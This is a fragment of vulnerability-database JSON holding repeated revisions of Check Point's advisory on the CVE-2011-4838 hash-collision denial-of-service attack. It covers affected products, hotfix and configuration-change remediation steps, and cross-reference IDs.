"idList": ["SECURITYVULNS:DOC:27501", "SECURITYVULNS:DOC:27500"]}, {"type": "seebug", "idList": ["SSV:72454", "SSV:26122", "SSV:26121", "SSV:26126", "SSV:30001"]}, {"type": "freebsd", "idList": ["91BE81E7-3FEA-11E1-AFC7-2C4138874F7D"]}, {"type": "openvas", "idList": ["OPENVAS:863954", "OPENVAS:1361412562310122001", "OPENVAS:1361412562310870529", "OPENVAS:831554", "OPENVAS:1361412562310863681", "OPENVAS:1361412562310120218", "OPENVAS:881075", "OPENVAS:1361412562310122002", "OPENVAS:1361412562310881167", "OPENVAS:136141256231071568", "OPENVAS:71568", "OPENVAS:1361412562310863706", "OPENVAS:1361412562310864028", "OPENVAS:1361412562310863921", "OPENVAS:863921", "OPENVAS:881167", "OPENVAS:870638", "OPENVAS:1361412562310831554", "OPENVAS:70754", "OPENVAS:1361412562310870638", "OPENVAS:863681", "OPENVAS:136141256231070754"]}, {"type": "nessus", "idList": ["FEDORA_2012-0420.NASL", "CENTOS_RHSA-2012-0070.NASL", "REDHAT-RHSA-2012-0019.NASL", "SL_20120111_PHP53_AND_PHP_ON_SL5_X.NASL", "FEDORA_2011-17551.NASL", "ALA_ALAS-2012-35.NASL", "PHP_5_HASH_COLLISION_DOS.NBIN", "MANDRIVA_MDVSA-2012-024.NASL", "DEBIAN_DLA-209.NASL", "SL_20120130_RUBY_ON_SL6_X.NASL", "REDHAT-RHSA-2012-0070.NASL", "ORACLELINUX_ELSA-2012-0069.NASL", "ORACLELINUX_ELSA-2012-0070.NASL", "MANDRIVA_MDVSA-2011-197.NASL", "GENTOO_GLSA-201207-06.NASL", "ASP_NET_HASH_COLLISION_DOS.NBIN", "FREEBSD_PKG_91BE81E73FEA11E1AFC72C4138874F7D.NASL", "CENTOS_RHSA-2012-0069.NASL", "F5_BIGIP_SOL13588.NASL", "SOLARIS11_RUBY_20120417.NASL", "FEDORA_2012-0504.NASL", "SL_20120130_RUBY_ON_SL4_X.NASL", "FEDORA_2011-17542.NASL", "REDHAT-RHSA-2012-0069.NASL", "FEDORA_2012-1262.NASL"]}, {"type": "gentoo", "idList": ["GLSA-201207-06"]}, {"type": "centos", "idList": ["CESA-2012:0069", "CESA-2012:0093", "CESA-2012:0070"]}, {"type": "jvn", "idList": ["JVN:90615481"]}, {"type": "fedora", "idList": ["FEDORA:3515C213E6", "FEDORA:BFF2C21133", "FEDORA:8CC7E20B55", "FEDORA:76D5120DE0", "FEDORA:6D8EE20EB6"]}, {"type": "amazon", "idList": ["ALAS-2012-035"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0070", "ELSA-2012-0069", "ELSA-2012-0019"]}, {"type": "redhat", "idList": ["RHSA-2012:0069", "RHSA-2012:0019", "RHSA-2012:0070"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B8DA2EAADC9FCF2EF821731BB51E75E7"]}, {"type": "exploitdb", "idList": ["EDB-ID:18296", "EDB-ID:18305"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:108287", "PACKETSTORM:108294"]}, {"type": "debian", "idList": ["DEBIAN:DLA-209-1:3C908", "DEBIAN:DLA-209-1:6EC99"]}, {"type": "rubygems", "idList": ["RUBY:JRUBY-2011-4838-78116"]}], "modified": "2021-11-06T03:31:41", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2021-11-06T03:31:41", "rev": 2}}, "objectVersion": "1.6", "affectedSoftware": [{"version": "R71", "operator": "eq", "name": "quantum security gateways"}, {"version": "R75", "operator": "eq", "name": "quantum security gateways"}, {"version": "R71", "operator": "eq", "name": "endpoint security server"}, {"version": "R75", "operator": "eq", "name": "endpoint security server"}, {"version": "R71", "operator": "eq", "name": "mobile access / ssl vpn"}, {"version": "R75", "operator": "eq", "name": "mobile access / ssl vpn"}]}, "lastseen": "2021-11-06T07:08:19", "differentElements": ["modified", "published"], "edition": 13}, {"bulletin": {"id": "CPS:SK66350", "vendorId": null, "hash": "fc0b35930d07b486d73f615d467b0b5b", "type": "checkpoint_security", "bulletinFamily": "software", "title": "Check Point response to \"DoS through hash table against Web Application Platforms\" (CVE-2011-4838)", "description": "Symptoms\n\n * On December 28, 2011, at the CCC conference, a new algorithmic complexity attack against hash table mechanisms of multiple web application platforms was published. \n \n\n * For technical details please refer to the following information: \n\n * <http://www.nruns.com/_downloads/advisory28122011.pdf>\n * <http://events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf>\n * Related CVEs: CVE-2011-4815, CVE-2011-3414, and CVE-2011-4885\n \n \n\n * To address this vulnerability, Check Point released a HotFix and an IPS protection. \n\nSolution\n\nThe following products are **not** vulnerable:\n\n * Security Gateway \n * Versions: R70 and earlier \n * Platforms: Windows OS and Solaris OS for all gateway versions (including R71 and R75) \n * Applications: SecurePlatform WebUI, SmartPortal, IPSO Voyager on all gateway versions (including R71 and R75) \n\nThe following products are **vulnerable** :\n\n * Security Gateway \n * Versions: R71, R75, R75.10\n * Platforms: SecurePlatform, IPSO \n * Vulnerable applications: Mobile Access Blade, DLP, Identity Awareness and UserCheck portals \n * Endpoint Security Server - all versions \n * Integrity Server - all versions \n * Connectra - all versions \n\n**Solution for Security Gateway and Connectra portals**\n\nTo protect a Security Gateway from this vulnerability follow the instructions\nbelow:\n\n * Download [SG_HotFix_CVE-2011-4838.sh](https://supportcenter.checkpoint.com/supportcenter/portal?action=portlets.DCFileAction&eventSubmit_doGetdcdetails=&fileid=13554 \"HotFix\") and copy it to the Security Gateway. \n * Run: SG_HotFix_CVE-2011-4838.sh \n\n**Solution for Endpoint Security Server**\n\nTo protect an Endpoint Security Server from this vulnerability run the\nfollowing commands on the Endpoint Security Server machine:\n\n 1. Run: **cpstop**\n 2. Run: **cd %UEPMDIR%\\engine\\conf**\n 3. Run: **copy server.xml server.xml.bak**\n 4. Remove the following line from _server.xml_ : **< Context docBase=\"WRH\" path=\"/webrh\" reloadable=\"false\"/>**\n 5. Run: **cpstart**\n\n**Solution for Integrity Server**\n\n[Contact Check Point\nSupport](http://www.checkpoint.com/services/contact/index.html) to get a\nHotfix for this issue. \nA Support Engineer will make sure the Hotfix is compatible with your\nenvironment before providing the Hotfix.\n\nCheck Point recommends to always protect management servers behind a Security\nGateway.\n\n**IPS protection**\n\nTo protect web applications behind the Security Gateway, Check Point suggests\nenabling the \"Microsoft IIS Repeated Parameters Request Denial of Service\"\nprotection. Check Point also released advisory\n[CPAI-2011-593](http://www.checkpoint.com/defense/advisories/public/2011/cpai-29-dec.html)\nwith specific instructions.\n\nThis pre-emptive IPS protection released in September 2010 will block this\nattack.\n\n", "published": "2011-12-30T08:00:00", "modified": "2011-12-30T08:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "href": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk66350", "reporter": "Check Point Security Alerts", "references": [], "cvelist": ["CVE-2011-3414", "CVE-2011-4815", "CVE-2011-4838", "CVE-2011-4885"], "immutableFields": [], "lastseen": "2021-11-06T11:10:28", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cert", "idList": ["VU:903934"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2011-4815", "UB:CVE-2011-4885", "UB:CVE-2011-4838"]}, {"type": "cve", "idList": ["CVE-2011-4885", "CVE-2011-4838", "CVE-2011-3414", "CVE-2011-4815"]}, {"type": "f5", "idList": ["F5:K13588", "SOL13588"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4885/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4885/", "MSF:ILITIES/APPLE-OSX-PHP-CVE-2011-4885/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4815/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4815/", "MSF:ILITIES/JUNIPER-JUNOS-OS-JSA10522/"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2013-033", "CPAI-2014-1022", "CPAI-2012-001"]}, {"type": "seebug", "idList": ["SSV:26122", "SSV:26126", "SSV:26121", "SSV:30001", "SSV:72454"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27500", "SECURITYVULNS:DOC:27501"]}, {"type": "freebsd", "idList": ["D3921810-3C80-11E1-97E8-00215C6A37BB", "91BE81E7-3FEA-11E1-AFC7-2C4138874F7D"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310863681", "OPENVAS:1361412562310870542", "OPENVAS:1361412562310863740", "OPENVAS:1361412562310122001", "OPENVAS:831554", "OPENVAS:863824", "OPENVAS:1361412562310881167", "OPENVAS:881119", "OPENVAS:1361412562310831554", "OPENVAS:1361412562310864028", "OPENVAS:863815", "OPENVAS:1361412562310863921", "OPENVAS:136141256231071568", "OPENVAS:1361412562310120218", "OPENVAS:136141256231070754", "OPENVAS:863681", "OPENVAS:1361412562310863735", "OPENVAS:1361412562310870638", "OPENVAS:870638", "OPENVAS:881167", "OPENVAS:70754", "OPENVAS:1361412562310120256", "OPENVAS:1361412562310863706", "OPENVAS:71568", "OPENVAS:1361412562310122002", "OPENVAS:863921", "OPENVAS:1361412562310120220", "OPENVAS:70735"]}, {"type": "nessus", "idList": ["CENTOS_RHSA-2012-0070.NASL", "ALA_ALAS-2012-35.NASL", "FEDORA_2011-17551.NASL", "REDHAT-RHSA-2012-0069.NASL", "DEBIAN_DLA-209.NASL", "FEDORA_2012-0504.NASL", "MANDRIVA_MDVSA-2012-024.NASL", "PHP_5_HASH_COLLISION_DOS.NBIN", "FEDORA_2011-17542.NASL", "ASP_NET_HASH_COLLISION_DOS.NBIN", "REDHAT-RHSA-2012-0070.NASL", "SL_20120130_RUBY_ON_SL4_X.NASL", "ORACLELINUX_ELSA-2012-0069.NASL", "ORACLELINUX_ELSA-2012-0070.NASL", "MANDRIVA_MDVSA-2011-197.NASL", "FREEBSD_PKG_91BE81E73FEA11E1AFC72C4138874F7D.NASL", "GENTOO_GLSA-201207-06.NASL", "F5_BIGIP_SOL13588.NASL", "SOLARIS11_RUBY_20120417.NASL", "SL_20120130_RUBY_ON_SL6_X.NASL", "CENTOS_RHSA-2012-0069.NASL", "FEDORA_2012-0420.NASL"]}, {"type": "gentoo", "idList": ["GLSA-201207-06"]}, {"type": "centos", "idList": ["CESA-2012:0070", "CESA-2012:0069"]}, {"type": "jvn", "idList": ["JVN:90615481"]}, {"type": "fedora", "idList": ["FEDORA:6D8EE20EB6", "FEDORA:BFF2C21133"]}, {"type": "amazon", "idList": ["ALAS-2012-035"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0070", "ELSA-2012-0069"]}, {"type": "redhat", "idList": ["RHSA-2012:0070", "RHSA-2012:0092", "RHSA-2012:0069"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:108287", "PACKETSTORM:108294"]}, {"type": "exploitdb", "idList": ["EDB-ID:18296", "EDB-ID:18305"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B8DA2EAADC9FCF2EF821731BB51E75E7"]}, {"type": "debian", "idList": ["DEBIAN:DLA-209-1:6EC99", "DEBIAN:DLA-209-1:3C908"]}, {"type": "rubygems", "idList": ["RUBY:RUBY-2011-4815-78118", "RUBY:JRUBY-2011-4838-78116"]}], "modified": "2021-11-06T11:10:28", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2021-11-06T11:10:28", "rev": 2}}, "objectVersion": "1.6", "affectedSoftware": [{"version": "R71", "operator": "eq", "name": "quantum security gateways"}, {"version": "R75", "operator": "eq", "name": "quantum security gateways"}, {"version": "R71", "operator": "eq", "name": "endpoint security server"}, {"version": "R75", "operator": "eq", "name": "endpoint security server"}, {"version": "R71", "operator": "eq", "name": "mobile access / ssl vpn"}, {"version": "R75", "operator": "eq", "name": "mobile access / ssl vpn"}]}, "lastseen": "2021-11-06T11:10:28", "differentElements": ["modified", "published"], "edition": 14}, {"bulletin": {"id": "CPS:SK66350", "vendorId": null, "hash": "cfdde2d0d2a7ecab5dccde9688c57e9c", "type": "checkpoint_security", "bulletinFamily": "software", "title": "Check Point response to \"DoS through hash table against Web Application Platforms\" (CVE-2011-4838)", "description": "Symptoms\n\n * On December 28, 2011, at the CCC conference, a new algorithmic complexity attack against hash table mechanisms of multiple web application platforms was published. \n \n\n * For technical details please refer to the following information: \n\n * <http://www.nruns.com/_downloads/advisory28122011.pdf>\n * <http://events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf>\n * Related CVEs: CVE-2011-4815, CVE-2011-3414, and CVE-2011-4885\n \n \n\n * To address this vulnerability, Check Point released a HotFix and an IPS protection. \n\nSolution\n\nThe following products are **not** vulnerable:\n\n * Security Gateway \n * Versions: R70 and earlier \n * Platforms: Windows OS and Solaris OS for all gateway versions (including R71 and R75) \n * Applications: SecurePlatform WebUI, SmartPortal, IPSO Voyager on all gateway versions (including R71 and R75) \n\nThe following products are **vulnerable** :\n\n * Security Gateway \n * Versions: R71, R75, R75.10\n * Platforms: SecurePlatform, IPSO \n * Vulnerable applications: Mobile Access Blade, DLP, Identity Awareness and UserCheck portals \n * Endpoint Security Server - all versions \n * Integrity Server - all versions \n * Connectra - all versions \n\n**Solution for Security Gateway and Connectra portals**\n\nTo protect a Security Gateway from this vulnerability follow the instructions\nbelow:\n\n * Download [SG_HotFix_CVE-2011-4838.sh](https://supportcenter.checkpoint.com/supportcenter/portal?action=portlets.DCFileAction&eventSubmit_doGetdcdetails=&fileid=13554 \"HotFix\") and copy it to the Security Gateway. \n * Run: SG_HotFix_CVE-2011-4838.sh \n\n**Solution for Endpoint Security Server**\n\nTo protect an Endpoint Security Server from this vulnerability run the\nfollowing commands on the Endpoint Security Server machine:\n\n 1. Run: **cpstop**\n 2. Run: **cd %UEPMDIR%\\engine\\conf**\n 3. Run: **copy server.xml server.xml.bak**\n 4. Remove the following line from _server.xml_ : **< Context docBase=\"WRH\" path=\"/webrh\" reloadable=\"false\"/>**\n 5. Run: **cpstart**\n\n**Solution for Integrity Server**\n\n[Contact Check Point\nSupport](http://www.checkpoint.com/services/contact/index.html) to get a\nHotfix for this issue. \nA Support Engineer will make sure the Hotfix is compatible with your\nenvironment before providing the Hotfix.\n\nCheck Point recommends to always protect management servers behind a Security\nGateway.\n\n**IPS protection**\n\nTo protect web applications behind the Security Gateway, Check Point suggests\nenabling the \"Microsoft IIS Repeated Parameters Request Denial of Service\"\nprotection. Check Point also released advisory\n[CPAI-2011-593](http://www.checkpoint.com/defense/advisories/public/2011/cpai-29-dec.html)\nwith specific instructions.\n\nThis pre-emptive IPS protection released in September 2010 will block this\nattack.\n\n", "published": "2011-12-29T22:00:00", "modified": "2011-12-29T22:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "href": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk66350", "reporter": "Check Point Security Alerts", "references": [], "cvelist": ["CVE-2011-3414", "CVE-2011-4815", "CVE-2011-4838", "CVE-2011-4885"], "immutableFields": [], "lastseen": "2021-11-06T19:11:26", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cert", "idList": ["VU:903934"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2011-4885", "UB:CVE-2011-4838", "UB:CVE-2011-4815"]}, {"type": "cve", "idList": ["CVE-2011-4885", "CVE-2011-4838", "CVE-2011-4815", "CVE-2011-3414"]}, {"type": "f5", "idList": ["F5:K13588", "SOL13588"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4885/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4815/", "MSF:ILITIES/JUNIPER-JUNOS-OS-JSA10522/", "MSF:ILITIES/APPLE-OSX-PHP-CVE-2011-4885/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4815/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4885/"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2012-001", "CPAI-2013-033", "CPAI-2014-1022"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27501", "SECURITYVULNS:DOC:27500"]}, {"type": "seebug", "idList": ["SSV:26126", "SSV:30001", "SSV:72454", "SSV:26122", "SSV:26121"]}, {"type": "freebsd", "idList": ["91BE81E7-3FEA-11E1-AFC7-2C4138874F7D"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310870638", "OPENVAS:1361412562310863742", "OPENVAS:1361412562310831554", "OPENVAS:1361412562310863921", "OPENVAS:71568", "OPENVAS:864028", "OPENVAS:1361412562310863815", "OPENVAS:1361412562310122002", "OPENVAS:1361412562310881149", "OPENVAS:70754", "OPENVAS:831554", "OPENVAS:881167", "OPENVAS:863921", "OPENVAS:863681", "OPENVAS:1361412562310881095", "OPENVAS:136141256231071568", "OPENVAS:1361412562310881167", "OPENVAS:1361412562310122001", "OPENVAS:1361412562310863735", "OPENVAS:1361412562310863681", "OPENVAS:1361412562310863963", "OPENVAS:136141256231070754", "OPENVAS:1361412562310122012", "OPENVAS:870638", "OPENVAS:1361412562310120218"]}, {"type": "nessus", "idList": ["CENTOS_RHSA-2012-0070.NASL", "ORACLELINUX_ELSA-2012-0069.NASL", "SL_20120130_RUBY_ON_SL6_X.NASL", "F5_BIGIP_SOL13588.NASL", "REDHAT-RHSA-2012-0070.NASL", "MANDRIVA_MDVSA-2012-024.NASL", "FEDORA_2012-1301.NASL", "PHP_5_HASH_COLLISION_DOS.NBIN", "SOLARIS11_RUBY_20120417.NASL", "SL_20120130_RUBY_ON_SL4_X.NASL", "FREEBSD_PKG_91BE81E73FEA11E1AFC72C4138874F7D.NASL", "GENTOO_GLSA-201207-06.NASL", "REDHAT-RHSA-2012-0069.NASL", "FEDORA_2011-17551.NASL", "CENTOS_RHSA-2012-0069.NASL", "ALA_ALAS-2012-35.NASL", "FEDORA_2012-0504.NASL", "FEDORA_2012-0420.NASL", "DEBIAN_DLA-209.NASL", "ORACLELINUX_ELSA-2012-0070.NASL", "ASP_NET_HASH_COLLISION_DOS.NBIN", "FEDORA_2011-17542.NASL"]}, {"type": "gentoo", "idList": ["GLSA-201207-06"]}, {"type": "centos", "idList": ["CESA-2012:0070", "CESA-2012:0069", "CESA-2012:0092"]}, {"type": "jvn", "idList": ["JVN:90615481"]}, {"type": "fedora", "idList": ["FEDORA:4930D21410", "FEDORA:BFF2C21133", "FEDORA:6D8EE20EB6", "FEDORA:A38F421375", "FEDORA:6D55C20D95"]}, {"type": "amazon", "idList": ["ALAS-2012-035"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0019", "ELSA-2012-0069", "ELSA-2012-0070"]}, {"type": "redhat", "idList": ["RHSA-2012:0070", "RHSA-2012:0069"]}, {"type": "exploitdb", "idList": ["EDB-ID:18305", "EDB-ID:18296"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:108294", "PACKETSTORM:108287"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B8DA2EAADC9FCF2EF821731BB51E75E7"]}, {"type": "debian", "idList": ["DEBIAN:DLA-209-1:3C908", "DEBIAN:DLA-209-1:6EC99"]}, {"type": "rubygems", "idList": ["RUBY:RUBY-2011-4815-78118", "RUBY:JRUBY-2011-4838-78116"]}], "modified": "2021-11-06T19:11:26", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2021-11-06T19:11:26", "rev": 2}}, "objectVersion": "1.6", "affectedSoftware": [{"version": "R71", "operator": "eq", "name": "quantum security gateways"}, {"version": "R75", "operator": "eq", "name": "quantum security gateways"}, {"version": "R71", "operator": "eq", "name": "endpoint security server"}, {"version": "R75", "operator": "eq", "name": "endpoint security server"}, {"version": "R71", "operator": "eq", "name": "mobile access / ssl vpn"}, {"version": "R75", "operator": "eq", "name": "mobile access / ssl vpn"}]}, "lastseen": "2021-11-06T19:11:26", "differentElements": ["modified", "published"], "edition": 15}, {"bulletin": {"id": "CPS:SK66350", "vendorId": null, "hash": "fc0b35930d07b486d73f615d467b0b5b", "type": "checkpoint_security", "bulletinFamily": "software", "title": "Check Point response to \"DoS through hash table against Web Application Platforms\" (CVE-2011-4838)", "description": "Symptoms\n\n * On December 28, 2011, at the CCC conference, a new algorithmic complexity attack against hash table mechanisms of multiple web application platforms was published. \n \n\n * For technical details please refer to the following information: \n\n * <http://www.nruns.com/_downloads/advisory28122011.pdf>\n * <http://events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf>\n * Related CVEs: CVE-2011-4815, CVE-2011-3414, and CVE-2011-4885\n \n \n\n * To address this vulnerability, Check Point released a HotFix and an IPS protection. \n\nSolution\n\nThe following products are **not** vulnerable:\n\n * Security Gateway \n * Versions: R70 and earlier \n * Platforms: Windows OS and Solaris OS for all gateway versions (including R71 and R75) \n * Applications: SecurePlatform WebUI, SmartPortal, IPSO Voyager on all gateway versions (including R71 and R75) \n\nThe following products are **vulnerable** :\n\n * Security Gateway \n * Versions: R71, R75, R75.10\n * Platforms: SecurePlatform, IPSO \n * Vulnerable applications: Mobile Access Blade, DLP, Identity Awareness and UserCheck portals \n * Endpoint Security Server - all versions \n * Integrity Server - all versions \n * Connectra - all versions \n\n**Solution for Security Gateway and Connectra portals**\n\nTo protect a Security Gateway from this vulnerability follow the instructions\nbelow:\n\n * Download [SG_HotFix_CVE-2011-4838.sh](https://supportcenter.checkpoint.com/supportcenter/portal?action=portlets.DCFileAction&eventSubmit_doGetdcdetails=&fileid=13554 \"HotFix\") and copy it to the Security Gateway. \n * Run: SG_HotFix_CVE-2011-4838.sh \n\n**Solution for Endpoint Security Server**\n\nTo protect an Endpoint Security Server from this vulnerability run the\nfollowing commands on the Endpoint Security Server machine:\n\n 1. Run: **cpstop**\n 2. Run: **cd %UEPMDIR%\\engine\\conf**\n 3. Run: **copy server.xml server.xml.bak**\n 4. Remove the following line from _server.xml_ : **< Context docBase=\"WRH\" path=\"/webrh\" reloadable=\"false\"/>**\n 5. Run: **cpstart**\n\n**Solution for Integrity Server**\n\n[Contact Check Point\nSupport](http://www.checkpoint.com/services/contact/index.html) to get a\nHotfix for this issue. \nA Support Engineer will make sure the Hotfix is compatible with your\nenvironment before providing the Hotfix.\n\nCheck Point recommends to always protect management servers behind a Security\nGateway.\n\n**IPS protection**\n\nTo protect web applications behind the Security Gateway, Check Point suggests\nenabling the \"Microsoft IIS Repeated Parameters Request Denial of Service\"\nprotection. Check Point also released advisory\n[CPAI-2011-593](http://www.checkpoint.com/defense/advisories/public/2011/cpai-29-dec.html)\nwith specific instructions.\n\nThis pre-emptive IPS protection released in September 2010 will block this\nattack.\n\n", "published": "2011-12-30T08:00:00", "modified": "2011-12-30T08:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "href": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk66350", "reporter": "Check Point Security Alerts", "references": [], "cvelist": ["CVE-2011-3414", "CVE-2011-4815", "CVE-2011-4838", "CVE-2011-4885"], "immutableFields": [], "lastseen": "2021-11-07T19:14:20", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cert", "idList": ["VU:903934"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2011-4885", "UB:CVE-2011-4815", "UB:CVE-2011-4838"]}, {"type": "cve", "idList": ["CVE-2011-4885", "CVE-2011-4838", "CVE-2011-4815", "CVE-2011-3414"]}, {"type": "f5", "idList": ["F5:K13588", "SOL13588"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4885/", "MSF:ILITIES/APPLE-OSX-PHP-CVE-2011-4885/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4815/", "MSF:ILITIES/JUNIPER-JUNOS-OS-JSA10522/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4885/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4815/"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2012-001", "CPAI-2014-1022", "CPAI-2013-033"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27500", "SECURITYVULNS:DOC:27501"]}, {"type": "seebug", "idList": ["SSV:30001", "SSV:26122", "SSV:26126", "SSV:26121", "SSV:72454"]}, {"type": "freebsd", "idList": ["91BE81E7-3FEA-11E1-AFC7-2C4138874F7D"]}, {"type": "openvas", "idList": ["OPENVAS:870638", "OPENVAS:1361412562310863735", "OPENVAS:1361412562310863954", "OPENVAS:1361412562310120220", "OPENVAS:881167", "OPENVAS:1361412562310120218", "OPENVAS:1361412562310863742", "OPENVAS:863921", "OPENVAS:864015", "OPENVAS:1361412562310870638", "OPENVAS:1361412562310122001", "OPENVAS:1361412562310863921", "OPENVAS:70754", "OPENVAS:1361412562310881226", "OPENVAS:1361412562310831554", "OPENVAS:1361412562310881149", "OPENVAS:1361412562310122002", "OPENVAS:1361412562310863681", "OPENVAS:863681", "OPENVAS:831554", "OPENVAS:71568", "OPENVAS:136141256231071568", "OPENVAS:1361412562310881167", "OPENVAS:136141256231070754"]}, {"type": "nessus", "idList": ["DEBIAN_DLA-209.NASL", "FEDORA_2011-17542.NASL", "SL_20120111_PHP53_AND_PHP_ON_SL5_X.NASL", "FEDORA_2011-17551.NASL", "SOLARIS11_RUBY_20120417.NASL", "FEDORA_2012-0420.NASL", "SL_20120130_RUBY_ON_SL4_X.NASL", "FREEBSD_PKG_91BE81E73FEA11E1AFC72C4138874F7D.NASL", "FEDORA_2012-0504.NASL", "SL_20120130_RUBY_ON_SL6_X.NASL", "MANDRIVA_MDVSA-2012-024.NASL", "ORACLELINUX_ELSA-2012-0069.NASL", "FEDORA_2012-1262.NASL", "ALA_ALAS-2012-35.NASL", "ORACLELINUX_ELSA-2012-0070.NASL", "GENTOO_GLSA-201207-06.NASL", "F5_BIGIP_SOL13588.NASL", "ASP_NET_HASH_COLLISION_DOS.NBIN", "FREEBSD_PKG_D39218103C8011E197E800215C6A37BB.NASL", "CENTOS_RHSA-2012-0070.NASL", "REDHAT-RHSA-2012-0070.NASL", "CENTOS_RHSA-2012-0069.NASL", "PHP_5_HASH_COLLISION_DOS.NBIN", "REDHAT-RHSA-2012-0069.NASL"]}, {"type": "gentoo", "idList": ["GLSA-201207-06"]}, {"type": "centos", "idList": ["CESA-2012:0093", "CESA-2012:0070", "CESA-2012:0069"]}, {"type": "jvn", "idList": ["JVN:90615481"]}, {"type": "fedora", "idList": ["FEDORA:7F79620D03", "FEDORA:6D8EE20EB6", "FEDORA:3515C213E6", "FEDORA:6097820D6A", "FEDORA:BFF2C21133"]}, {"type": "amazon", "idList": ["ALAS-2012-035"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0069", "ELSA-2012-0070"]}, {"type": "redhat", "idList": ["RHSA-2012:0069", "RHSA-2012:0070"]}, {"type": "debian", "idList": ["DEBIAN:DLA-209-1:6EC99", "DEBIAN:DLA-209-1:3C908"]}, {"type": "exploitdb", "idList": ["EDB-ID:18296", "EDB-ID:18305"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B8DA2EAADC9FCF2EF821731BB51E75E7"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:108294", "PACKETSTORM:108287"]}, {"type": "rubygems", "idList": ["RUBY:JRUBY-2011-4838-78116", "RUBY:RUBY-2011-4815-78118"]}], "modified": "2021-11-07T19:14:20", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2021-11-07T19:14:20", "rev": 2}}, "objectVersion": "1.6", "affectedSoftware": [{"version": "R71", "operator": "eq", "name": "quantum security gateways"}, {"version": "R75", "operator": "eq", "name": "quantum security gateways"}, {"version": "R71", "operator": "eq", "name": "endpoint security server"}, {"version": "R75", "operator": "eq", "name": "endpoint security server"}, {"version": "R71", "operator": "eq", "name": "mobile access / ssl vpn"}, {"version": "R75", "operator": "eq", "name": "mobile access / ssl vpn"}]}, "lastseen": "2021-11-07T19:14:20", "differentElements": ["modified", "published"], 